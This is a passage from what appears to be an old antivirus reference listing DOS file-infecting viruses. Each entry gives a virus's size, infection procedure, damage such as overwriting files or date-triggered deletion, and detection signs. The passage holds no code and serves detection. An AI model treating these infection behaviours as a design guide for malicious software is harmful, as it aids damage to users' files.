  1964. Executing Procedure:
  1965. 1) Searches for a .COM file in the current
  1966.    directory.
  1967. 2) Checks whether it has been infected by
  1968.    Minimite. If "Yes", it continues to look for
  1969.    any uninfected .COM files.
  1970. 3) It them continues to infect files until all
  1971.    the .COM files in the directory have been
  1972.    infected.
  1973. Damage:  None
  1974. Detecting Method:  Infected files will increase
  1975.                    by 183 Bytes.
  1976. Note:
  1977. 1) Doesn't stay resident in memory.
  1978. 2) Minimite doesn't hook INT 24h when infecting
  1979.    files.  Error message occurs if there is an
  1980.    I/O error (such as write protect).
  1981.  
  1982. [Spanz]
  1983. Virus Name: Spanz
  1984. Virus Type: File Infector Virus
  1985.             (infects .COM files)
  1986. Virus Length: 639 Bytes
  1987. PC Vectors Hooked: None
  1988. Executing Procedure:
  1989. 1) Searches for a .COM file in the current
  1990.    directory.
  1991. 2) It then checks the date of  the .COM file.
  1992. 3) Checks whether it has been infected by Spanz.
  1993.    If "Yes", continues to look for any uninfected
  1994.    .COM files.
  1995. 3) Infects only one file at a time.
  1996. Damage:  None
  1997. Detecting Method:  Infected files will increase
  1998.                    by 639 Bytes.
  1999. Note:
  2000. 1) Doesn't stay resident in memory.
  2001. 2) Spanz doesn't hook INT 24h when infecting
  2002.    files.  Error message occurs if there is an I/O
  2003.    error (such as write protect).
  2004.  
  2005. [Wilbur]
  2006. Virus Name: Wilbur
  2007. Virus Type: File Infector Virus
  2008.             (infects .COM files)
  2009. Virus Length: 512 Bytes
  2010. PC Vectors Hooked: None
  2011. Executing Procedure:
  2012. 1) Searches for a .COM file in the current
  2013.    directory.
  2014. 2) It then checks whether it has been infected by
  2015.    Wilbur. If "Yes", it continues to look for any
  2016.    uninfected .COM files.
  2017. 3) It infects only only one file at a time.
  2018. 4) After infection it executes the originally
  2019.    called  file.
  2020. Damage:  None
  2021. Detecting Method:  Infected files will increase
  2022.                    by 512 Bytes.
  2023. Note:
  2024. 1) Doesn't stay resident in memory.
  2025. 2) Wilbur doesn't hook INT 24h when infecting
  2026.    files. Error message occurs if there is an I/O
  2027.    error (such as  write protect).
  2028.  
  2029. [Repent]
  2030. Virus Name: Repent
  2031. Virus Type: File Infector Virus
  2032.             (infects .COM files)
  2033. Virus Length: No change
  2034. PC Vectors Hooked: None
  2035. Executing Procedure:
  2036. 1) Searches for a .COM file in the current
  2037.    directory.
  2038. 2) It then checks whether it has been infected by
  2039.    Repent. If "Yes", it continues to look for any
  2040.    uninfected .COM file.
  2041. 3) It infects only three files at a time.
  2042. Damage:  Overwrites original file, so the
  2043.          length of infected file won't increase.
  2044. Note:
  2045. 1) Doesn't stay resident in memory.
  2046. 2) Repent doesn't hook INT 24h when infecting
  2047.    files. Error message occurs if there is an I/O
  2048.    error (such as  write protect).
  2049.  
  2050. [Twin-Peak]
  2051. Virus Name: Twin-Peak
  2052. Virus Type: File Infector Virus
  2053.             (infects .COM files)
  2054. Virus Length: No change
  2055. PC Vectors Hooked: None
  2056. Executing Procedure:
  2057. 1) Searches for a .COM file in the  current
  2058.    directory.
  2059. 2) Checks to see whether it has been infected by
  2060.    TWIN-PEAK. If "Yes", it continues to look for
  2061.    any uninfected .COM file.
  2062. 3) It infects only one file at time.
  2063. Damage:  Overwrites original file, so the length
  2064.          of infected file won't increase.
  2065. Note:
  2066. 1) Doesn't stay resident in memory.
  2067. 2) TWIN-PEAK doesn't hook INT 24h when infecting
  2068.    files.  Error message occurs if there is an I/O
  2069.    error (such as write protect).
  2070.  
  2071. [Pa-5792]
  2072. Virus Name: Pa-5792
  2073. Virus Type: File Infector Virus
  2074.             (infects .EXE files)
  2075. Virus Length: 5792 Bytes
  2076. PC Vectors Hooked: None
  2077. Executing Procedure:
  2078. 1) Searches for an .EXE file in the current
  2079.    directory and the "A:" drive.
  2080. 2) It then checks whether it has been infected
  2081.    by PA-5792. If "Yes", it continues to look for
  2082.    any uninfected .EXE file.
  2083. 3) It infects only seven files at a time.
  2084. 4) It executes the originally called file.
  2085. Damage:  None
  2086. Detecting Method:  Infected files will increase
  2087.                    by 5792 Bytes.
  2088. Note:
  2089. 1) Doesn't stay resident in memory.
  2090. 2) PA-5792 doesn't hook INT 24h when infecting
  2091.    files. Error message occurs if there is an
  2092.    I/O error (such as write protect).
  2093.  
  2094. [Les]
  2095. Virus Name: Les
  2096. Virus Type: File Infector Virus
  2097.             (infects .EXE files)
  2098. Virus Length: 358 Bytes
  2099. PC Vectors Hooked: None
  2100. Executing Procedure:
  2101. 1) Searches  for an .EXE file in the current
  2102.    directory.
  2103. 2) It then checks to see whether it has been
  2104.    infected by the LES virus.  If "Yes", it
  2105.    continues to look for any uninfected .EXE file.
  2106. 3) It finally infects all .EXE files in the
  2107.    directory.
  2108. Damage:  None
  2109. Detecting Method:  Infected files will increase
  2110.                    by 358 Bytes.
  2111. Note:
  2112. 1) Doesn't stay resident in memory.
  2113. 2) LES doesn't hook INT 24h when infecting files.
  2114.    Error message occurs if there is an I/O error
  2115.    (such as write protect).
  2116.  
  2117. [H & P]
  2118. Virus Name: H&P
  2119. Virus Type: File Infector Virus (infects .COM
  2120. files)
  2121. Virus Length: No change
  2122. PC Vectors Hooked: None
  2123. Executing Procedure:
  2124. 1) Searches for a COM file in the current
  2125.    directory.
  2126. 2) It then checks whether it has been infected
  2127.    already by H&P. If "Yes", it continues to look
  2128.    for any uninfected .COM files.
  2129. 3) It finally will infect only one file at a time.
  2130. Damage:  Overwrites original file, so the length
  2131.          of infected file won't increase.
  2132. Note:
  2133. 1) Doesn't stay resident in memory.
  2134. 2) H&P doesn't hook INT 24h when infecting files.
  2135.    Error message occurs if there is an I/O error
  2136.    (such as write protect).
  2137.  
  2138. [OW]
  2139. Virus Name: Ow
  2140. Virus Type: File Infector Virus
  2141.             (infects .COM files)
  2142. Virus Length: No change
  2143. PC Vectors Hooked: None
  2144. Executing Procedure:
  2145. 1) Searches for a COM file in the current
  2146.    directory.
  2147. 2) It then checks to see whether it has been
  2148.    already infected by OW. If "Yes", it continues
  2149.    to look for any uninfected .COM file.
  2150. 3) It finally infects all files in the directory.
  2151. Damage:  Overwrites original files, so the
  2152.          length of infected file won't increase.
  2153. Note:
  2154. 1) Doesn't stay resident in memory.
  2155. 2) OW doesn't hook INT 24h when infecting files.
  2156.    Error message occurs if there is an I/O error
  2157.    (such as write protect).
  2158.  
  2159. [Small115]
  2160. Virus Name: Small115
  2161. Virus Type: File Infector Virus
  2162.             (infects .COM files)
  2163. Virus Length: 115 Bytes
  2164. PC Vectors Hooked: None
  2165. Executing Procedure:
  2166. 1) Searches for a .COM file in the current
  2167.    directory.
  2168. 2) It then checks whether it has been infected by
  2169.    Small115. If "Yes", it continues to look
  2170.    for any uninfected .COM file.
  2171. 3) It finally infects all the .COM files in the
  2172.    directory.
  2173. Damage:  Infected files won't be able to execute.
  2174. Detecting Method:  Infected files will increase by 115 Bytes.
  2175. Note:
  2176. 1) Doesn't stay resident in memory.
  2177. 2) Small115 doesn't hook INT 24h when infecting
  2178.    files.  Error message occurs if there is an
  2179.    I/O error of (such as write protect).
  2180.  
  2181. [Torm-263]
  2182. Virus Name: Torm-263
  2183. Virus Type: File Infector Virus
  2184.             (infects .COM files)
  2185. Virus Length: 263 Bytes(COM)
  2186. PC Vectors Hooked: None
  2187. Executing Procedure:
  2188. 1) Searches for a .COM file in the current
  2189.    directory.
  2190. 2) It then checks whether it has been infected by
  2191.    TORM-263. If "Yes", it continues to look
  2192.    for any uninfected .COM files.
  2193. 3) It then infects all uninfected files in the
  2194.    directory.
  2195. 4) Finally, it executes the original file.
  2196. Damage:  None
  2197. Detecting Method:  Infected files will increase
  2198.                    by 263 Bytes.
  2199. Note:
  2200. 1) Doesn't stay resident in memory.
  2201. 2) TORM-263 doesn't  hook INT 24h when infecting
  2202.    files. Error message occurs if there is an
  2203.    I/O error (such as write protect).
  2204.  
  2205. [Radyum]
  2206. Virus Name: Radyum
  2207. Virus Type: File Infector Virus
  2208.             (infects .COM files)
  2209. Virus Length: 448 Bytes(COM)
  2210. PC Vectors Hooked: None
  2211. Executing Procedure:
  2212. 1) Searches for a .COM file in the current
  2213.    directory.
  2214. 2) It checks whether it has been infected by
  2215.    Radyum. If "Yes", it continues to look for any
  2216.    uninfected .COM files.
  2217. 3) It infects only one file at a time).
  2218. 4) Finally it executes the original file.
  2219. Damage:  None
  2220. Detecting Method:
  2221. Infected files will increase by 448 Bytes.
  2222. Note:
  2223. 1) Doesn't stay resident in memory.
  2224. 2) Radyum doesn't hook INT 24h when infecting
  2225.    files. Error message occurs if there is an I/O
  2226.    error (such as  write protect).
  2227.  
  2228. [Psycho]
  2229. Virus Name: Psycho
  2230. Virus Type: File Infector Virus
  2231.             (infects .EXE & .COM files)
  2232. Virus Length: No change
  2233. PC Vectors Hooked: None
  2234. Executing Procedure:
  2235. 1) Searches for a .COM or .EXE file in the current
  2236.    directory.
  2237. 2) It checks whether any files have been infected
  2238.    by Psycho. If "Yes", it continues to search for
  2239.    an uninfected .COM or .EXE file.
  2240. 3) It then infects all  .EXE & .COM files in
  2241.    the directory.
  2242. Damage:  Overwrites original files, so the
  2243.          length of infected files won't increase.
  2244. Note:
  2245. 1) Doesn't stay resident in memory.
  2246. 2) Psycho doesn't hook INT 24h when infecting
  2247.    files. Error message occurs if there is an I/O
  2248.    error (such as  write protect).
  2249.  
  2250. [VCL9]
  2251. Virus Name: Vcl9
  2252. Virus Type: File Infector Virus
  2253.             (infects .EXE & .COM files)
  2254. Virus Length: No change
  2255. PC Vectors Hooked: None
  2256. Executing Procedure:
  2257. 1) Searches for .COM or .EXE files in the current
  2258.    directory.
  2259. 2) It checks  whether the first file found has
  2260.    been infected by VCL9. If "Yes", it continues
  2261.    looking for any uninfected .COM or .EXE file.
  2262. 3) It then infects only two files at a time).
  2263. Damage:  Overwrites original files, so the
  2264.          length of infected files won't increase.
  2265. Note:
  2266. 1) Doesn't stay resident in memory.
  2267. 2) VCL9 doesn't hook INT 24h when infecting
  2268.    files. Error message occurs if there is an
  2269.    I/O error (such as write protect).
  2270.  
  2271. [Cheesy]
  2272. Virus Name: Cheesy
  2273. Virus Type: File Infector Virus
  2274.             (infects .EXE files)
  2275. Virus Length: 381 Bytes(EXE)
  2276. PC Vectors Hooked: None
  2277. Executing Procedure:
  2278. 1) Searches for an .EXE file in the current
  2279.    directory.
  2280. 2) When it locates an .EXE file it checks
  2281.    whether it has been infected by CHEESY. If
  2282.    "Yes", it continues to look for an uninfected
  2283.    .EXE file.
  2284. 3) It then proceeds to infect all the .EXE files
  2285.    in the directory.
  2286. 4) Once a file is executed the system halts.
  2287. Damage:  System halt.
  2288. Detecting Method:  Infected files will increase
  2289.                    by 381 Bytes.
  2290. Note:
  2291. 1) Doesn't stay resident in memory.
  2292. 2) CHEESY doesn't hook INT 24h when infecting
  2293.    files. Error message occurs if there is an I/O
  2294.    error (such as  write protect).
  2295.  
  2296. [Dutch]
  2297. Virus Name: Dutch
  2298. Virus Type: File Infector Virus
  2299.             (infects .COM files)
  2300. Virus Length: 358 Bytes(COM)
  2301. PC Vectors Hooked: None
  2302. Executing Procedure:
  2303. 1) Searches for a .COM file in the current
  2304.    directory.
  2305. 2) When it locates a file it checks whether it has
  2306.    been infected by Dutch. If "Yes", it continues
  2307.    looking for any uninfected .COM file.
  2308. 3) It infects only one file at a time.
  2309. Damage:  None
  2310. Detecting Method:  Infected files will increase
  2311.                    by 358 Bytes.
  2312. Note:
  2313. 1) Doesn't stay resident in memory.
  2314. 2) Dutch doesn't hook INT 24h when infecting
  2315.    files.  Error message occurs if there is an I/O
  2316.    error (such as write protect).
  2317.  
  2318. [Mini-2]
  2319. Virus Name: Mini-2
  2320. Virus Type: File Infector Virus
  2321.             (infects .COM files)
  2322. Virus Length: No change
  2323. PC Vectors Hooked: None
  2324. Executing Procedure:
  2325. 1) Searches for a .COM file in the current
  2326.    directory.
  2327. 2) Once it locates the first .COM file it checks
  2328.    whether it has been infected by MINI-2.  If
  2329.    "Yes", it continues to look for any
  2330.    uninfected .COM files.
  2331. 3) It then infects all .COM in the directory.
  2332. Damage:  Overwrites original files, so the
  2333.          length of infected files won't increase.
  2334. Note:
  2335. 1) Doesn't stay resident in memory.
  2336. 2) MINI-2 doesn't hook INT 24h when infecting
  2337.    files. Error message occurs if there is an I/O
  2338.    error (such as  write protect).
  2339.  
  2340. [Define-1]
  2341. Virus Name: Define-1
  2342. Virus Type: File Infector Virus (infects .EXE & .COM files)
  2343. Virus Length: No change
  2344. PC Vectors Hooked: None
  2345. Executing Procedure:
  2346. 1) Searches for an .EXE or .COM file in the
  2347.    current directory.
  2348. 2) Once it locates a file it checks whether it has
  2349.    been infected by Define-1. If "Yes", it
  2350.    continues to look for another uninfected .COM
  2351.    or .EXE file.
  2352. 3) It infects only one file at a time.
  2353. Damage:  Overwrites original file, so the
  2354.          length of infected file won't increase.
  2355. Note:
  2356. 1) Doesn't stay resident in memory.
  2357. 2) Define-1 doesn't  hook INT 24h when infecting
  2358.    files. Error message occurs if there is an
  2359.    I/O error (such as write protect).
  2360.  
  2361. [205]
  2362. Virus Name: 205
  2363. Virus Type: File Infector Virus
  2364.             (infects .COM files)
  2365. Virus Length: 205 Bytes(COM)
  2366. PC Vectors Hooked: None
  2367. Executing Procedure:
  2368. 1) Searches for a .COM file in the current
  2369.    directory.
  2370. 2) When it locates a .COM file it checks if the
  2371.    file has been previously infected by 205. If
  2372.    "Yes", it continues to look for an uninfected
  2373.    .COM file.
  2374. 3) It then proceeds to infect all the .COM files
  2375.    in the directory.
  2376. 4) Finally it executes the originally called file.
  2377. Damage:  None
  2378. Detecting Method:  Infected files will increase
  2379.                    by 205 Bytes.
  2380. Note:
  2381. 1) Doesn't stay resident in memory.
  2382. 2) 205 doesn't hook INT 24h when infecting files.
  2383.    Error message occurs if there is an I/O error
  2384.    (such as write protect).
  2385.  
  2386. [Banana]
  2387. Virus Name: Banana
  2388. Virus Type: File Infector Virus
  2389.             (infects .COM files)
  2390. Virus Length: No change
  2391. PC Vectors Hooked: None
  2392. Executing Procedure:
  2393. 1) Searches for a .COM file in the current
  2394.    directory.
  2395. 2) When it locates a .COM file it checks whether
  2396.    or not it has been infected by Banana. If
  2397.    "Yes", it continues to search for another
  2398.    uninfected .COM file.
  2399. 3) It then proceeds to infect all .COM files in
  2400.    the directory.
  2401. Damage:  Overwrites original file, so the
  2402.          length of infected file won't increase.
  2403. Note:
  2404. 1) Doesn't stay resident in memory.
  2405. 2) Banana doesn't hook INT 24h when infecting
  2406.    files. Error message occurs if there is an I/O
  2407.    error of (such  as write protect).
  2408.  
  2409. [334]
  2410. Virus Name: 334
  2411. Virus Type: File Infector Virus
  2412.             (infects .COM files)
  2413. Virus Length: 334 Bytes(COM)
  2414. PC Vectors Hooked: None
  2415. Executing Procedure:
  2416. 1) Searches for a .COM file in the current
  2417.    directory.
  2418. 2) Once it locates a .COM file it checks whether
  2419.    it has been infected by 334. If "Yes", it
  2420.    continues to search for an uninfected .COM
  2421.    file.
  2422. 3) It infect uninfected files one at a time.
  2423. 4) Finally it executes the original file.
  2424. Damage:  None
  2425. Detecting Method:  Infected files will increase
  2426.                    by 334 Bytes.
  2427. Note:
  2428. 1) Doesn't stay resident in memory.
  2429. 2) 334 doesn't hook INT 24h when infecting files.
  2430.    Error message occurs if there is an I/O error
  2431.    (such as write protect.)
  2432.  
  2433. [Redx-1]
  2434. Virus Name: Redx-1
  2435. Virus Type: File Infector Virus
  2436.             (infects .COM files)
  2437. Virus Length: 796 Bytes
  2438. PC Vectors Hooked: None
  2439. Executing Procedure:
  2440. 1) Searches for a .COM file in the C:\ root
  2441.    directory.
  2442. 2) Once it locates a .COM  file it checks whether
  2443.    it has been infected by REDX-1. If "Yes", it
  2444.    continues searching for an uninfected .COM
  2445.    file.
  2446. 3) It then infects other .COM files two at a time.
  2447. 4) It finally executes the original file.
  2448. Damage:  None
  2449. Detecting Method:  Infected files will increase
  2450.                    by 796 Bytes.
  2451. Note:
  2452. 1) Doesn't stay resident in memory.
  2453. 2) REDX-1 doesn't hook INT 24h when infecting
  2454.    files. Error message occurs if there is an I/O
  2455.    error (such as  write protect).
  2456.  
  2457. [Dismember]
  2458. Virus Name: Dismember
  2459. Virus Type: File Infector Virus
  2460.             (infects .COM files)
  2461. Virus Length: 288 Bytes(COM)
  2462. PC Vectors Hooked: None
  2463. Executing Procedure:
  2464. 1) Searches  for a .COM file in the current
  2465.    directory.
  2466. 2) Once it locates a .COM  file it checks whether
  2467.    it has been infected by Dismember. If "Yes", it
  2468.    continues to search for an uninfected .COM
  2469.    file.
  2470. 3) It then infects all .COM files in the
  2471.    directory.
  2472. 4) Finally, it executes the originally called
  2473.    file.
  2474. Damage:  None
  2475. Detecting Method:  Infected files will increase
  2476.                    by 288 Bytes.
  2477. Note:
  2478. 1) Doesn't stay resident in memory.
  2479. 2) Dismember doesn't hook INT 24h when infecting
  2480.    files. Error message occurs if there is an
  2481.    I/O error (such as write protect).
  2482.  
  2483. [Timid]
  2484. Virus Name: Timid
  2485. Virus Type: File Infector Virus
  2486.             (infects .COM files)
  2487. Virus Length: 306 Bytes(COM)
  2488. PC Vectors Hooked: None
  2489. Executing Procedure:
  2490. 1) Searches for a .COM file in the current
  2491.    directory.
  2492. 2) Once it locates a file it checks whether it has
  2493.    been infected by Timid. If "Yes", it continues
  2494.    to search for a uninfected .COM file.
  2495. 3) It then infects one file at a time and displays
  2496.    the infected file name on the screen.
  2497. 4) Once the file is executed the system  will
  2498.    halt.
  2499. Damage:  Damages original file.
  2500. Detecting Method:
  2501. 1) Infected files will increase by 306 Bytes.
  2502. 2) Other file   names are shown on the screen.
  2503. Note:
  2504. 1) Doesn't stay resident in memory.
  2505. 2) Timid doesn't hook INT 24h when infecting
  2506.    files.  Error message occurs if there is an I/O
  2507.    error of (such as write protect).
  2508.  
  2509. [Druid]
  2510. Virus Name: Druid
  2511. Virus Type: File Infector Virus
  2512.             (infects .COM files)
  2513. Virus Length: No change
  2514. PC Vectors Hooked: None
  2515. Executing Procedure:
  2516. 1) Searches for a COM file in the current
  2517.    directory.
  2518. 2) Once it locates a file it checks whether it has
  2519.    been infected by Druid. If "Yes", it continues
  2520.    to search  for any uninfected .COM file.
  2521. 3) It then infects all .COM files in the
  2522.    directory.
  2523. Damage:  Overwrites original file, so the
  2524.          length of infected file won't increase.
  2525. Note:
  2526. 1) Doesn't stay resident in memory.
  2527. 2) Druid doesn't hook INT 24h when infecting
  2528.    files.  Error message occurs if there is an I/O
  2529.    error (such as write protect).
  2530.  
  2531. [Itti-B]
  2532. Virus Name: Itti-B
  2533. Virus Type: File Infector Virus
  2534.             (infects .COM files)
  2535. Virus Length: No change
  2536. PC Vectors Hooked: None
  2537. Executing Procedure:
  2538. 1) Searches for a .COM file in the current
  2539.    directory.
  2540. 2) Once it locates a file it checks whether it has
  2541.    been infected by ITTI-B. If "Yes", it continues
  2542.    to look for any  uninfected .COM file.
  2543. 3) It will infect only one file at a time.
  2544. 4) It finally damages all the data on current
  2545.    disk if none of the .COM files are infected.
  2546. Damage:
  2547. 1) Overwrites original file, so the length of
  2548.    infected  file won't increase.
  2549. 2) Damages all data on current disk if none of
  2550.    the .COM files are infected.
  2551. Note:
  2552. 1) Doesn't stay resident in memory.
  2553. 2) ITTI-B doesn't hook INT 24h when infecting
  2554.    files. Error message occurs if there is an I/O
  2555.    error (such as  write protect).
  2556.  
  2557. [Itti-A]
  2558. Virus Name: Itti-A
  2559. Virus Type: File Infector Virus
  2560.             (infects .COM files)
  2561. Virus Length: No change
  2562. PC Vectors Hooked: None
  2563. Executing Procedure:
  2564. 1) Searches for a .COM file in the current
  2565.    directory.
  2566. 2) Once it locates a .COM file it checks whether
  2567.    it has been infected by ITTI-A. If "Yes",  it
  2568.    continues to look for any  uninfected .COM
  2569.    file.
  2570. 3) It infects only one file at a time. Then when
  2571.    the file is executed the message  "EXEC
  2572.    FAILURE" will show on the screen.
  2573. 4) It will finally damage all data on current disk
  2574.    if no .COM file is infected.
  2575. Damage:
  2576. 1) Overwrites original file, so the length of
  2577.    infected  file won't increase.
  2578. 2) Damages all data on current disk if no .COM
  2579.    file is infected.
  2580. Note:
  2581. 1) Doesn't stay resident in memory.
  2582. 2) ITTI-A doesn't hook INT 24h when infecting
  2583.    files. Error message occurs if there is an I/O
  2584.    error (such as  writing protect).
  2585.  
  2586. [Burger]
  2587. Virus Name: Burger
  2588. Virus Type: File Infector Virus
  2589.             (infects .COM files)
  2590. Virus Length: No change
  2591. PC Vectors Hooked: None
  2592. Executing Procedure:
  2593. 1) Search for a COM file in current directory.
  2594. 2) Check whether it has been infected by Burger.
  2595.    If "Yes", continue to look for a uninfected COM
  2596.    file.
  2597. 3) Infect only an uninfected file at one time.
  2598. 4) Damage all data of current disk if no COM file
  2599.    is infected.
  2600. Damage:
  2601. 1) Overwrite original file, so the length of
  2602.    infected file won't increase.
  2603. 2) Damage all data of current disk if no COM
  2604.    file is infected
  2605. Note:
  2606. 1) Don't stay resident in memory.
  2607. 2) Burger don't hook INT 24h when infecting files.
  2608.    Error message occurs if there is an error of
  2609.    I/O(such as writing protect).
  2610.  
  2611. [Bloodlust]
  2612. Virus Name: Bloodlust
  2613. Virus Type: File Infector Virus
  2614.             (infects .COM files)
  2615. Virus Length: No change
  2616. PC Vectors Hooked: None
  2617. Executing Procedure:
  2618. 1) Searches for a *.C* file in the current
  2619.    directory.
  2620. 2) Once it locates a file it checks whether it has
  2621.    been infected by Bloodlust. If "Yes", it
  2622.    continues to look for any uninfected *.C* file.
  2623. 3) Once it locates a *.C* file it will infect it
  2624.    and continue doing this until all the *.C*
  2625.    files are infected.
  2626. Damage:
  2627. 1) Overwrites original file, so the length of
  2628.    infected  file won't increase.
  2629. Note:
  2630. 1) Doesn't stay resident in memory.
  2631. 2) Bloodlust doesn't hook INT 24h when infecting
  2632.    files. Error message occurs if there is an
  2633.    I/O error (such as write protect).
  2634.  
  2635. [ZY]
  2636. Virus Name: Zy
  2637. Virus Type: File Infector Virus
  2638.             (infects .COM files)
  2639. Virus Length: 463 Bytes(COM)
  2640. PC Vectors Hooked: None
  2641. Executing Procedure:
  2642. 1) Searches for a .COM file in the current
  2643.    directory.
  2644. 2) Once it locates a file it checks whether it has
  2645.    been infected by ZY. If "Yes", it continues to
  2646.    look for any  uninfected .COM file.
  2647. 3) It will infect only one file at a time.
  2648. 4) It finally executes the originally called file.
  2649. Damage:  None
  2650. Detecting Method:
  2651. 1) Infected files will increase by 463 Bytes.
  2652. Note:
  2653. 1) Doesn't stay resident in memory.
  2654. 2) ZY doesn't hook INT 24h when infecting files.
  2655.    Error message occurs if there is an I/O error
  2656.    (such as write protect).
  2657.  
  2658. [Kode4-2]
  2659. Virus Name: Kode4-2
  2660. Virus Type: File Infector Virus
  2661.             (infects .COM files)
  2662. Virus Length: ABOUT 3000 Bytes(COM)
  2663. PC Vectors Hooked: None
  2664. Executing Procedure:
  2665. 1) Searches for a *.C* file in the current
  2666.    directory.
  2667. 2) Infects all the *.C* files in the directory.
  2668. 3) Then the following screen message will appear:
  2669.    "-=+ Kode4 +=-, The one and ONLY!"
  2670. Damage:  Overwrites original files.
  2671. Detecting Method:
  2672. 1) Check whether the message:
  2673.    "-=+ Kode4 +=- The one and ONLY!" showed
  2674.    on screen.
  2675. Note:
  2676. 1) Doesn't stay resident in memory.
  2677. 2) Kode4-2 doesn't hook INT 24h when infecting
  2678.    files. Error message occurs if there is an
  2679.    I/O error (such as write protect).
  2680.  
  2681. [Mini-212]
  2682. Virus Name: Mini-212
  2683. Virus Type: File Infector Virus
  2684.             (infects .COM files)
  2685. Virus Length: 212 or 300 Bytes(COM)
  2686. PC Vectors Hooked: None
  2687. Executing Procedure:
  2688. 1) Searches for a .COM file in the current
  2689.    directory beginning with files starting with
  2690.    the letter  "A" and randomly selecting files
  2691.    through the letter  "Z".
  2692. 2) Once finding a file it checks whether it has
  2693.    been infected by MINI-212. If "Yes", it
  2694.    continues to look for a uninfected .COM file.
  2695. 3) It only infects one file at a time.
  2696. Damage:  None
  2697. Detecting Method:
  2698. 1) Infected files will increase by 212 or 300
  2699.    bytes.
  2700. Note:
  2701. 1) Doesn't stay resident in memory.
  2702. 2) MINI-212 doesn't hook INT 24h when infecting
  2703.    files. Error message occurs if there is an
  2704.    I/O error (such as write protect).
  2705.  
  2706. [Anna]
  2707. Virus Name: Anna
  2708. Virus Type: File Infector Virus
  2709.             (infects .COM files)
  2710. Virus Length: 742 Bytes(COM)
  2711. PC Vectors Hooked: None
  2712. Executing Procedure:
  2713. 1) Searches for a .COM file in the current
  2714.    directory.
  2715. 2) Once it locates a file it checks whether it has
  2716.    been infected by ANNA. If "Yes", it continues
  2717.    to look for any  uninfected .COM file.
  2718. 3) It will infect only one file at a time.
  2719. 4) If no uninfected file is found in the current
  2720.    directory, it will continue to look for an
  2721.    uninfected file in another directory.
  2722. 5) It will then check system date. If it is
  2723.    December, then this message will appear on
  2724.    the screen: Yole from the ARcV.............."
  2725. Damage:  None
  2726. Detecting Method:
  2727. 1) Infected files will increase by 742 Bytes.
  2728. 2) If it is December a message will appear on
  2729.    screen: Yole from the ARcV.........".
  2730. Note:
  2731. 1) Doesn't stay resident in memory.
  2732. 2) ANNA doesn't hook INT 24h when infecting
  2733.    files. Error message occurs if there is an
  2734.    I/O error (such as writing protect).
  2735.  
  2736. [Grunt2]
  2737. Virus Name: Grunt2
  2738. Virus Type: File Infector Virus
  2739.             (infects .COM files)
  2740. Virus Length: 427 Bytes(COM)
  2741. PC Vectors Hooked: None
  2742. Executing Procedure:
  2743. 1) Searches for a .COM file in the current
  2744.    directory.
  2745. 2) Once it locates a file it checks whether it has
  2746.    been infected by GRUNT2. If "Yes", it continues
  2747.    to look for any  uninfected .COM file.
  2748. 3) It will infect only one file at a time.
  2749. 4) It then checks the system date. If the date is
  2750.    the 3rd of September and year is larger than
  2751.    1993, it will delete    a file on the current
  2752.    disk and then show the screen message: "S[GRUNT-
  2753.    2] -=> Agent Orange '92 <=-       Rock of the
  2754.    Marne Sir!.......".
  2755. Damage:
  2756. If system date is 3rd of September and year is
  2757. larger than 1993, the virus will delete a file on the
  2758. current disk.
  2759. Detecting Method:
  2760. 1) Infected files will increase by 427 Bytes.
  2761. Note:
  2762. 1) Doesn't stay resident in memory.
  2763. 2) GRUNT2 doesn't hook INT 24h when infecting
  2764.    files. Error message occurs if there is an I/O
  2765.    error (such as a write protect).
  2766.  
  2767. [VDV-853]
  2768. Virus Name: Vdv-853
  2769. Virus Type: File Infector Virus
  2770.             (infects .COM files)
  2771. Virus Length: 853 Bytes(COM)
  2772. PC Vectors Hooked: None
  2773. Executing Procedure:
  2774. 1) Checks whether the system date is between the 24th
  2775.    and 26th of December, if "yes",  the virus will
  2776.    delete all files in current directory, then
  2777.    create a file with 273 bytes and show the
  2778.    message: "Frhliche Weihnachten wnscht der
  2779.    Verband Deutscher Virenliebhaber Ach ja, und
  2780.    dann wnschen wir auch noch viel Spab beim
  2781.    Suchen nach den Daten von der Festplatte!
  2782.    Hello - Copyright S&S International, 1990".
  2783. 2) If "No", then it will search for a .COM file in
  2784.    the current directory.  b) Once it locates a
  2785.    file it checks whether it has been infected by
  2786.    VDV-853. If "Yes", it continues to look for a
  2787.    uninfected .COM file.  c) It will infect only
  2788.    four files at a time.
  2789. Damage:
  2790. If the system date is between the 24th and 26th of
  2791. the  December, the virus will delete all files in the
  2792. current directory.
  2793. Detecting Method:
  2794. 1) Infected files will increase by 853 Bytes.
  2795. Note:
  2796. 1) Doesn't stay resident in memory.
  2797. 2) VDV-853 don't hook INT 24h when infecting
  2798.    files. Error message occurs if there is an
  2799.    error of I/O (such as a write protect).
  2800. 3) Virus pattern is the same as "SON_OF_VSC_2".
  2801.  
  2802. $#Wild Thing
  2803. Virus Name: Wild-Thing
  2804. Virus Type: File Infector Virus
  2805.             (infects .COM files)
  2806. Virus Length: 567 Bytes(COM)
  2807. PC Vectors Hooked: None
  2808. Executing Procedure:
  2809. 1) Checks whether system date is Friday, if "yes",
  2810.    a message appears on the screen:
  2811.    " It's Friday ........ Enjoy the weekend with
  2812.    your computer![YAM '92], Then the system halts.
  2813. 2) If "NO", then it will search for a .COM file in
  2814.    the current directory.  Once it locates a file
  2815.    it checks whether it has been infected by
  2816.    Wild-Thing. If "Yes", it continues to look for
  2817.    another uninfected .COM file.
  2818. 3) It will infect all files in the current and the
  2819.    "mother" directory until all .COM files have
  2820.    been infected.
  2821. 4) Then it will execute the original file.
  2822. Damage:
  2823. If the system date is Friday, this message shows
  2824. on screen: "It's Friday ....... Enjoy the weekend
  2825. with your computer![YAM '92], then system halt.
  2826. Detecting Method:
  2827. 1) Infected files will increase by 567 bytes.
  2828. Note:
  2829. 1) Doesn't stay resident in memory.
  2830. 2) Wild-Thing doesn't hook INT 24h when infecting
  2831.    files. Error message occurs if there is an I/O
  2832.    error (such as a write protect).
  2833.  
  2834. [Arcv-Fri]
  2835. Virus Name: Arcv-Fri
  2836. Virus Type: File Infector Virus
  2837.             (infects .COM files)
  2838. Virus Length: 839 Bytes(COM)
  2839. PC Vectors Hooked: None
  2840. Executing Procedure:
  2841. 1) Checks whether the system date is April 12th,
  2842.    if "Yes", it searches for a .COM in the
  2843.    current directory, then damages it.
  2844. 2) If "No", then it searches for a  .COM file in
  2845.    current directory.
  2846. 3) It checks whether it has been infected by
  2847.    ARCV-FRI.   If "Yes", it continues to look for
  2848.    any uninfected .COM file.
  2849. 4) It infects only one file at a time.
  2850. 5) It then executes the original file.
  2851. Damage:
  2852. If system date is April 12th, it searches for a
  2853. .COM file in the current directory, then damages
  2854. it.
  2855. Detecting Method:
  2856. 1) Infected files will increase by 839 Bytes.
  2857. Note:
